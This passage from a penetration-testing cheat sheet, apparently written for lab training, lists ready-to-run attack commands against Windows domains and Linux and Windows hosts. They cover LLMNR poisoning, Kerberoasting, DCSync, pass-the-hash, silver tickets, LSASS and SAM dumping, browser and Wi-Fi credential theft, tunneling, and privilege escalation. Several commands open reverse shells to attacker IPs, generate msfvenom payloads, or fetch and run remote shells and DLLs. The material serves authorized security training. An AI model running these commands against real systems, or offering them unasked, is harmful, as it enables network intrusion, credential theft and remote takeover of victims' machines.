responder -I tun0 -wv Run Responder to capture NetNTLM hashes by poisoning LLMNR and NBT-NS requests.
\\<ATTACKER_IP>\test Trigger authentication by accessing a UNC path; the victim sends its NetNTLM hash to the capturing host, which can crack it or relay it to another machine.

Tools for Use with Credentials

Tool/Command Description
crackmapexec ldap $IP -u user -p P4ssword --password-not-required --admin-count --users --groups Enumerate LDAP with credentials, focusing on admin users and groups.
enum4linux -u user -p P4ssword -a $IP Perform detailed SMB enumeration with credentials.
crackmapexec smb $IP -u user -p P4ssword Connect to SMB server with credentials.
crackmapexec smb $IP -u user -p P4ssword --shares List SMB shares accessible with credentials.
crackmapexec smb $IP -u user -p P4ssword -M spider_plus Run Spider Plus module with credentials.

Kerberos and Ticket Management

Tool/Command Description
impacket-getTGT domain.local/user:P4ssword Obtain a Kerberos ticket for the user.
export KRB5CCNAME=user.ccache Point the Kerberos ticket cache at the .ccache file written by getTGT so the Impacket tools can use it with -k.
klist List cached Kerberos tickets.
impacket-GetNPUsers -dc-ip $IP -no-pass -usersfile users.txt domain.local/ Perform AS-REP Roasting attack.
impacket-GetUserSPNs -request -dc-ip $IP domain.local/user Perform Kerberoasting attack.

Remote Access and Execution

Tool/Command Description
impacket-psexec domain.local/user:P4ssword@$IP Execute commands remotely via SMB.
crackmapexec winrm $IP -u user -p P4ssword Connect to WinRM with credentials.
evil-winrm -i $IP -u user -p P4ssword Connect to WinRM with credentials using Evil-WinRM.
crackmapexec rdp $IP -u user -p P4ssword Connect to RDP with credentials.
rdesktop -u user -p P4ssword -d domain.local $IP -r disk:tools=/home/kali/tools -r clipboard:PRIMARYCLIPBOARD Connect to RDP with credentials and mount tools.

Password Dumping and Hash Management

Tool/Command Description
impacket-secretsdump -just-dc domain.local/user:P4ssword@$IP Dump NTDS hashes from the domain controller.
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Dump local SAM, SYSTEM, and SECURITY files.
crackmapexec smb $IP -u user -p P4ssword --ntds Dump NTDS hashes via SMB.

Bloodhound and Network Visualization

Tool/Command Description
bloodhound-python -d domain.local -u user -p P4ssword -ns $IP -c all Collect data for Bloodhound network visualization.

Pass-the-Hash Attacks

Tool/Command Description
crackmapexec smb $IP -u administrator -H 'LMHASH:NTHASH' --local-auth Perform SMB login using pass-the-hash.
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@$IP Execute commands via SMB using pass-the-hash.
crackmapexec winrm $IP -u administrator -H 'LMHASH:NTHASH' --local-auth Connect to WinRM using pass-the-hash.
evil-winrm -i $IP -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 Connect to WinRM using pass-the-hash with Evil-WinRM.

Silver Ticket and Other Advanced Attacks

Tool/Command Description
impacket-getPac -targetUser administrator domain.local/user:P4ssword Retrieve the PAC of a user; it contains the domain SID needed to forge a Silver Ticket.
impacket-ticketer -spn MSSQLSvc/dc1.domain.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain domain.local Create a Silver Ticket for a service using the service account's NT hash (written to Administrator.ccache).
KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k -no-pass domain.local/Administrator@dc1.domain.local Connect to MSSQL using the Silver Ticket from the ccache.

Local Privilege Escalation and Shell Management

Tool/Command Description
.\mimikatz.exe "privilege::debug" "token::elevate" "log hashes.txt" "sekurlsa::tickets" "sekurlsa::logonpasswords" "lsadump::sam" "exit" Elevate privileges, log tickets, and dump SAM hashes using Mimikatz.
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit" Perform DCSync attack to dump domain hashes.
.\mimikatz.exe "kerberos::list /export" "exit" List and export Kerberos tickets.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 Enable WDigest so that cleartext passwords are cached in LSASS again; it only affects logons after the change, so a new logon is needed before Mimikatz can dump them.

Kerberos Ticket Management

Tool/Command Description
.\mimikatz.exe "privilege::debug" "kerberos::ptt 0-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi" "exit" Pass-the-ticket using a .kirbi file.

Bloodhound and Network Visualization

Tool/Command Description
.\SharpHound.exe -c all Collect data for Bloodhound network visualization.

Additional Tools and Commands

Tool/Command Description
net rpc password target_user -U pwned_user -S $IP Change a user's password using RPC.
sudo ntpdate $IP Synchronize time with the target server.

Pivot Network Cheatsheet

Pivoting and tunneling are crucial techniques used in network security testing and penetration testing to access and navigate through internal networks that are not directly reachable from the outside. Pivoting involves using a compromised host as a pivot point to move laterally within a network, bypassing segmentation and accessing previously isolated systems. This method is essential for expanding the attack surface and discovering new targets within a network. Tunneling, on the other hand, is a subset of pivoting that encapsulates network traffic within another protocol, allowing it to traverse restricted networks undetected. Common tunneling methods include SSH tunneling, which uses encrypted connections to relay traffic, and SOCKS proxies, which route traffic through a compromised host. Both techniques are vital for red team engagements and penetration tests, enabling testers to simulate real-world attacks and assess network vulnerabilities effectively.

Tunneling and Pivoting

Command Description
ifconfig Linux-based command that displays all current network configurations of a system.
ipconfig Windows-based command that displays all system network configurations.
netstat -r Command used to display the routing table for all IPv4-based protocols.
nmap -sT -p22,3306 <TARGET> Nmap command used to scan a target for open ports allowing SSH or MySQL connections.
ssh -L 1234:localhost:3306 ubuntu@<TARGET> SSH command used to create a local port forward: connections to port 1234 on the attack host are tunnelled through SSH to port 3306 on the remote target.
netstat -antp | grep 1234 Lists the listening socket the SSH client opened on local port 1234, confirming the forward is in place.
nmap -v -sV -p1234 localhost Nmap command used to scan the forwarded service through the tunnel on local port 1234.
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@<TARGET> SSH command that sets up several local port forwards in one session (local 1234 to the target's 3306, local 8080 to the target's 80).
ssh -D 9050 ubuntu@<TARGET> SSH command used to perform a dynamic port forward on port 9050 and establishes an SSH tunnel with the target. This is part of setting up a SOCKS proxy.
tail -4 /etc/proxychains.conf Linux-based command used to display the last 4 lines of /etc/proxychains.conf. Can be used to ensure socks configurations are in place.
proxychains nmap -v -sn 172.16.5.1-200 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Performs host discovery only (-sn, no port scan) against the hosts 172.16.5.1-200 with increased verbosity (-v). ICMP and raw packets do not pass through a SOCKS proxy, so a TCP connect scan with -Pn -sT is more reliable through the tunnel.
proxychains nmap -v -Pn -sT 172.16.5.19 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against 172.16.5.19 with increased verbosity (-v), disabling ping discover (-Pn), and using TCP connect scan type (-sT).
proxychains msfconsole Uses Proxychains to open Metasploit and send all generated network traffic through a SOCKS proxy.
msf6 > search rdp_scanner Metasploit search that attempts to find a module called rdp_scanner.
proxychains xfreerdp /v:<TARGET> /u:victor /p:pass@123 Used to connect to a target using RDP and a set of credentials through proxychains. This will send all traffic through a SOCKS proxy.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ATTACK_IP> -f exe -o backupscript.exe LPORT=8080 Uses msfvenom to generate a Windows-based reverse HTTPS Meterpreter payload that will send a call back to the IP address specified after LHOST= on port 8080 (LPORT=8080). Payload will take the form of an executable file called backupscript.exe.
msf6 > use exploit/multi/handler Used to select the multi-handler exploit module in Metasploit.
scp backupscript.exe ubuntu@<TARGET>:~/ Uses secure copy (scp) to transfer the file backupscript.exe to the specified host and places it in the ubuntu user's home directory (:~/).
python3 -m http.server 8123 Uses Python3 to start a simple HTTP server listening on port 8123. Can be used to retrieve files from a host.
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" PowerShell command used to download a file called backupscript.exe from a webserver (172.16.5.129:8123) and then save the file to location specified after -OutFile.
ssh -R <INTERNAL_IP_OF_PIVOT>:8080:0.0.0.0:80 ubuntu@<TARGET> -vN SSH command used to create a remote (reverse) port forward from the pivot host back to the attack host: the pivot listens on port 8080 of its internal interface and forwards each connection to port 80 on the attack host, so internal hosts can reach the attacker's listener (binding a non-loopback address needs GatewayPorts yes in the pivot's sshd). -N opens no shell; -v shows the forwarded connections.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ATTACK_IP> -f elf -o backupjob LPORT=8080 Uses msfvenom to generate a Linux-based Meterpreter reverse TCP payload that calls back to the IP specified after LHOST= on port 8080 (LPORT=8080). Payload takes the form of an executable ELF file called backupjob.
msf6> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 Metasploit command that runs a ping sweep module against the specified network segment (RHOSTS=172.16.5.0/23).
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done Bash one-liner ping sweep of 172.16.5.0/24 that prints only the hosts that replied.
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" Windows command-prompt ping sweep of 172.16.5.0/24 that prints only the hosts that replied.
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"} PowerShell ping sweep of 172.16.5.0/24 that prints True or False for every address.
msf6 > use auxiliary/server/socks_proxy Metasploit command that selects the socks_proxy auxiliary module.
msf6 auxiliary(server/socks_proxy) > jobs Metasploit command that lists all currently running jobs.
socks4 127.0.0.1 9050 Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 4 proxy is used in combination with proxychains on the specified IP address and port.
Socks5 127.0.0.1 1080 Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 5 proxy is used in combination with proxychains on the specified IP address and port.
msf6 > use post/multi/manage/autoroute Metasploit command used to select the autoroute module.
meterpreter > help portfwd Meterpreter command used to display the features of the portfwd command.
meterpreter > portfwd add -l 3300 -p 3389 -r Meterpreter-based portfwd command that adds a forwarding rule to the current Meterpreter session. This rule forwards network traffic on port 3300 on the local machine to port 3389 (RDP) on the target.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123 Uses xfreerdp to connect to a remote host through localhost:3300 using a set of credentials. Port forwarding rules must be in place for this to work properly.
netstat -antp Used to display all (-a) active network connections with associated process IDs. -t displays only TCP connections. -n displays only numerical addresses. -p displays process IDs associated with each displayed connection.
meterpreter > portfwd add -R -l 8081 -p 1234 -L Meterpreter-based portfwd command that adds a forwarding rule that directs traffic coming in on port 8081 to port 1234 listening on the IP address of the attack host.
meterpreter > bg Meterpreter-based command used to run the selected Meterpreter session in the background. Similar to backgrounding a process in Linux.
socat TCP4-LISTEN:8080,fork TCP4::80 Uses Socat to listen on port 8080 and then to fork when the connection is received. It will then connect to the attack host on port 80.
socat TCP4-LISTEN:8080,fork TCP4::8443 Uses Socat to listen on port 8080 and then to fork when the connection is received. Then it will connect to the target host on port 8443.
plink -D 9050 ubuntu@ Windows-based command that uses PuTTY's Plink.exe to perform SSH dynamic port forwarding and establishes an SSH tunnel with the specified target. This will allow for proxy chaining on a Windows host, similar to what is done with Proxychains on a Linux-based host.
sudo apt-get install sshuttle Uses apt-get to install the tool sshuttle.
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0 -v Runs sshuttle, connects to the target host, and creates a route to the 172.16.5.0 network so traffic can pass from the attack host to hosts on the internal network (172.16.5.0).
sudo git clone https://github.com/klsecservices/rpivot.git Clones the rpivot project GitHub repository.
sudo apt-get install python2.7 Uses apt-get to install python2.7.
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 Used to run the rpivot server (server.py) on proxy port 9050, server port 9999 and listening on any IP address (0.0.0.0).
scp -r rpivot ubuntu@ Uses secure copy protocol to transfer an entire directory and all of its contents to a specified target.
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 Used to run the rpivot client (client.py) to connect to the specified rpivot server on the appropriate port.
proxychains firefox-esr :80 Opens firefox with Proxychains and sends the web request through a SOCKS proxy server to the specified destination web server.
python client.py --server-ip --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain --username --password Used to run the rpivot client to connect to a web server that is using an HTTP proxy with NTLM authentication.
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 Windows-based command that uses netsh.exe to configure a v4tov4 portproxy rule that listens on port 8080 and forwards connections to the destination 172.16.5.25 on port 3389.
netsh.exe interface portproxy show v4tov4 Windows-based command used to view the configured v4tov4 portproxy rules.
git clone https://github.com/iagox86/dnscat2.git Clones the dnscat2 project GitHub repository.
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache Used to start the dnscat2.rb server running on the specified IP address, port (53) & using the domain inlanefreight.local with the no-cache option enabled.
git clone https://github.com/lukebaggett/dnscat2-powershell.git Clones the dnscat2-powershell project Github repository.
Import-Module dnscat2.ps1 PowerShell command used to import the dnscat2.ps1 tool.
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd PowerShell command used to connect to a specified dnscat2 server using an IP address, domain name and preshared secret. The client will send back a shell connection to the server (-Exec cmd).
dnscat2> ? Used to list dnscat2 options.
dnscat2> window -i 1 Used to interact with an established dnscat2 session.
./chisel server -v -p 1234 --socks5 Used to start a chisel server in verbose mode listening on port 1234 using SOCKS version 5.
./chisel client -v 10.129.202.64:1234 socks Used to connect to a chisel server at the specified IP address & port using socks.
git clone https://github.com/utoni/ptunnel-ng.git Clones the ptunnel-ng project GitHub repository.
sudo ./autogen.sh Used to run the autogen.sh shell script that will build the necessary ptunnel-ng files.
sudo ./ptunnel-ng -r10.129.202.64 -R22 Used to start the ptunnel-ng server on the specified IP address (-r) and corresponding port (-R22).
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 Used to connect to a specified ptunnel-ng server through local port 2222 (-l2222).
ssh -p2222 -lubuntu 127.0.0.1 SSH command used to connect to an SSH server through a local port. This can be used to tunnel SSH traffic through an ICMP tunnel.
regsvr32.exe SocksOverRDP-Plugin.dll Windows-based command used to register SocksOverRDP-Plugin.dll.
netstat -antb | findstr 1080 Windows-based command used to confirm that a listener is bound on port 1080 and which binary owns it.

Linux Privilege Escalation Cheatsheet

Linux privilege escalation is a critical security concern that involves exploiting vulnerabilities or misconfigurations to gain elevated access to a system. This technique can be used both by authorized users to perform administrative tasks and by attackers to compromise a system's security. Authorized users typically use tools like sudo to temporarily elevate their privileges for specific tasks, such as system configuration or software installation. However, attackers exploit weaknesses in the system, such as kernel vulnerabilities, misconfigured services, or file permissions, to escalate their privileges from a limited user account to the powerful root account. This can lead to severe consequences, including data theft, malware deployment, and system damage. Understanding the methods of privilege escalation is essential for both ethical hackers and system administrators to enhance security and prevent unauthorized access.

Linux

Command Description
ssh htb-student@ SSH to lab target
ps aux | grep root View processes running as root
ps au See logged in users
ls /home View user home directories
ls -l ~/.ssh Check for SSH keys for current user
history Check the current user's Bash history
sudo -l Can the user run anything as another user?
ls -la /etc/cron.daily Check for daily Cron jobs
lsblk Check for unmounted file systems/drives
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null Find world-writeable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null Find world-writeable files
uname -a Check the Kernel version
cat /etc/lsb-release Check the OS version
gcc kernel_exploit.c -o kernel_exploit Compile an exploit written in C
screen -v Check the installed version of Screen
./pspy64 -pf -i 1000 View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null Find binaries with the SETGID bit set
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root Priv esc with tcpdump
echo $PATH Check the current user's PATH variable contents
PATH=.:${PATH} Add a . to the beginning of the current user's PATH
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null Search for config files
ldd /bin/ls View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart Escalate privileges using LD_PRELOAD
readelf -d payroll | grep PATH Check a binary for RPATH/RUNPATH entries that control shared library lookup
gcc src.c -fPIC -shared -o /development/libshared.so Compile a shared library
lxd init Start the LXD initialization process
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine Import a local image
lxc init alpine r00t -c security.privileged=true Start a privileged LXD container
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true Mount the host file system in a container
lxc start r00t Start the container
showmount -e 10.129.2.12 Show the NFS export list
sudo mount -t nfs 10.129.2.12:/tmp /mnt Mount an NFS share locally
tmux -S /shareds new -s debugsess Create a shared tmux session socket
./lynis audit system Perform a system audit with Lynis

Windows Privilege Escalation Cheatsheet

Windows privilege escalation is a critical security concern where users or attackers exploit vulnerabilities to gain unauthorized access to higher levels of system privileges. This process involves transitioning from a lower-level user account to a more powerful one, such as an administrator or the "NT AUTHORITY\SYSTEM" account, often by exploiting system misconfigurations or security weaknesses. Privilege escalation can be categorized into two main types: vertical escalation, where an attacker elevates their privileges within the same account, and horizontal escalation, where they gain access to another account with similar or higher privileges. Understanding and managing privilege escalation is essential for both security professionals aiming to protect systems and penetration testers seeking to identify vulnerabilities. Techniques for privilege escalation include exploiting kernel vulnerabilities, abusing weak permissions, and leveraging tools like WinPEAS and PowerUp to identify potential escalation paths.

Initial Enumeration

Command Description
xfreerdp /v: /u:user /pth:32693b11e6aa90eb43d32c72a07ceea6 /dynamic-resolution +clipboard /drive:tools,/home/kali/tools RDP to lab target
ipconfig /all Get interface, IP address and DNS information
arp -a Review ARP table
route print Review routing table
Get-MpComputerStatus Check Windows Defender status
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Review the effective AppLocker rule collections
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone Test whether the local AppLocker policy allows Everyone to run cmd.exe
set Display all environment variables
systeminfo View detailed system configuration information
wmic qfe Get patches and updates
wmic product get name Get installed programs
tasklist /svc Display running processes
query user Get logged-in users
echo %USERNAME% Get current user
whoami /priv View current user privileges
whoami /groups View current user group information
net user Get all system users
net localgroup Get all system groups
net localgroup administrators View details about a group
net accounts Get password policy
netstat -ano Display active network connections
pipelist.exe /accepteula List named pipes
gci \\.\pipe\ List named pipes with PowerShell
accesschk.exe /accepteula \\.\Pipe\lsass -v Review permissions on a named pipe

Handy Commands

Command Description
mssqlclient.py sql_dev@10.129.43.30 -windows-auth Connect using mssqlclient.py
enable_xp_cmdshell Enable xp_cmdshell with mssqlclient.py
xp_cmdshell whoami Run OS commands with xp_cmdshell
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t * Escalate privileges with JuicyPotato
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd" Escalating privileges with PrintSpoofer
procdump.exe -accepteula -ma lsass.exe lsass.dmp Take memory dump with ProcDump
sekurlsa::minidump lsass.dmp and sekurlsa::logonpasswords Use MimiKatz to extract credentials from LSASS memory dump
dir /q C:\backups\wwwroot\web.config Checking ownership of a file
takeown /f C:\backups\wwwroot\web.config Taking ownership of a file
Get-ChildItem -Path 'C:\backups\wwwroot\web.config' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}} Checking ownership of a file with PowerShell
icacls "C:\backups\wwwroot\web.config" /grant htb-student:F Modifying a file ACL
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL Extract hashes with secretsdump.py
robocopy /B E:\Windows\NTDS .\ntds ntds.dit Copy files with ROBOCOPY
wevtutil qe Security /rd:true /f:text | Select-String "/user" Search the local Security event log for command lines containing /user
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user" Search the Security event log of a remote host (share01) with the supplied credentials
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } Search process creation events (4688) for command lines containing /user with PowerShell
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll Generate malicious DLL
dnscmd.exe /config /serverlevelplugindll adduser.dll Loading a custom DLL with dnscmd
wmic useraccount where name="netadm" get sid Finding a user's SID
sc.exe sdshow DNS Checking permissions on DNS service
sc stop dns Stopping a service
sc start dns Starting a service
reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters Querying a registry key
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll Deleting a registry key
sc query dns Checking a service status
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local Disabling the global query block list
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3 Adding a WPAD record
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp Compile with cl.exe
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" Add reference to a driver (1)
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 Add reference to a driver (2)
.\DriverView.exe /stext drivers.txt and cat drivers.txt | Select-String -pattern Capcom Export the loaded driver list with DriverView and check it for the Capcom driver
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys Using EopLoadDriver
c:\Tools\PsService.exe security AppReadiness Checking service permissions with PsService
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" Modifying a service binary path
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA Confirming UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin Checking UAC level
[environment]::OSVersion.Version Checking Windows version
cmd /c echo %PATH% Reviewing path variable
curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll" Downloading file with cURL in PowerShell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll Executing custom dll with rundll32.exe
.\SharpUp.exe audit Running SharpUp
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe" Checking service permissions with icacls
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe" Replace a service binary
wmic service get name,displayname,pathname,startmode | findstr /i "auto" List services configured to start automatically
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services Checking for weak service ACLs in the Registry
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443" Changing ImagePath with PowerShell
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User Enumerate startup programs with PowerShell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe Generating a malicious binary
get-process -Id 3324 Enumerating a process ID with PowerShell
get-service ?

Credential Theft

Command Description
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml Search for files with the phrase "password"
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password Search the Chrome custom dictionary for the word "password"
(Get-PSReadLineOption).HistorySavePath Confirm PowerShell history save path
gc (Get-PSReadLineOption).HistorySavePath Reading PowerShell history file
$credential = Import-Clixml -Path 'C:\scripts\pass.xml' Decrypting PowerShell credentials
cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt Searching file contents for a string
findstr /si password *.xml *.ini *.txt *.config Searching file contents for a string
findstr /spin "password" *.* Searching file contents for a string
select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password Search file contents with PowerShell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config Search for file extensions
where /R C:\ *.config Search for file extensions
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore Search for file extensions using PowerShell
cmdkey /list List saved credentials
.\SharpChrome.exe logins /unprotect Retrieve saved Chrome credentials
.\lazagne.exe -h View LaZagne help menu
.\lazagne.exe all Run all LaZagne modules
Invoke-SessionGopher -Target WINLPE-SRV01 Running SessionGopher
netsh wlan show profile View saved wireless networks
netsh wlan show profile ilfreight_corp key=clear Retrieve saved wireless passwords

Other Commands

Command Description
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat Transfer file with certutil
certutil -encode file1 encodedfile Encode file with certutil
certutil -decode encodedfile file2 Decode file with certutil
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer Query for always install elevated registry key (1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer Query for always install elevated registry key (2)
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi Generate a malicious MSI package
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart Executing an MSI package from command line
schtasks /query /fo LIST /v Enumerate scheduled tasks
Get-ScheduledTask | select TaskName,State Enumerate scheduled tasks with PowerShell
.\accesschk64.exe /accepteula -s -d C:\Scripts\ Check permissions on a directory
Get-LocalUser Check local user description field
Get-WmiObject -Class Win32_OperatingSystem | select Description Check the operating system description field
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd Mount VMDK on Linux
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1 Mount VHD/VHDX on Linux
sudo python2.7 windows-exploit-suggester.py --update Update Windows Exploit Suggester database
python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt Running Windows Exploit Suggester